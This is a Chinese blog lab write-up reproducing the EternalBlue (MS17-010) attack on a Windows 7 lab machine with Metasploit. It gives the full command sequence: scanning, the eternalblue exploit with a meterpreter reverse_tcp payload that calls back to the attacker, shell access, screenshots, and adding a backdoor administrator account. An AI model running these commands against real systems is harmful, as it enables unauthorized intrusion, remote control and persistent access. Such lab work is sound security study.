永恒之蓝ms17_010漏洞复现

本文详细介绍了如何利用永恒之蓝漏洞对Windows系统进行渗透测试。实验步骤包括了从测试主机连通性、开启数据库、扫描目标主机、发现漏洞到利用ms17_010模块进行攻击,并最终获取远程主机的控制权。此外,还展示了如何创建管理员用户以获取更高权限。
摘要由CSDN通过智能技术生成


永恒之蓝是一种利用windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

什么是SMB协议?

SMB(全称是Server Message
Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

实验环境

攻击机(kali):192.168.109.131

靶机 (win7):192.168.109.128

实验步骤

1.测试两台主机之间的连通性:用kali去ping windows7在这里插入图片描述

2.开启kali主机数据库:service postgresql

初始化msf数据库:msfdb init

开启msf:msfconsole
在这里插入图片描述

3.查看数据库连接状态:db_ststus

在这里插入图片描述

4.搜索ms17_010:search ms17_010
在这里插入图片描述

5.使用辅助模块的扫描命令:use auxiliary/scanner/smb/smb_ms17_010

6.查看模块所需设置的内容:options

在这里插入图片描述
RHOSTS :目标主机地址
RPORT :目标主机开放的端口,为445端口
THRENADS:线程,默认为1

7.扫描目标主机是否开放445端口:
在这里插入图片描述
8.设置目标主机地址:set rhosts 192.168.109.128
在这里插入图片描述
发现漏洞,很大可能可以利用.

9.进入攻击模块:use exploit/windows/smb/ms17_010_eternalblue

设置目标主机地址:set rhosts 192.168.109.128

10.设置payload: set payload windows/x64/meterpreter/reverse_tcp

最后在设置一下攻击机的地址:set lhost 192.168.109.131
在这里插入图片描述
攻击:exploit

在这里插入图片描述
攻击成功!

持续攻击

1.显示远程主机系统信息:sysinfo

在这里插入图片描述

2.查看用户身份:getuid

在这里插入图片描述

3.对远程主机当前屏幕进行截图:screenshot
截屏后,图片会显示在kali桌面

4.获取shell控制台:shell
在这里插入图片描述
5.创建管理员用户:net user stray 123456 /add
将stray加入到win7的本地管理员组中,获取更大权限:
net localgroup administrators stray /add
查看本机用户:net user
在这里插入图片描述
stray已经被添加到win7中!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值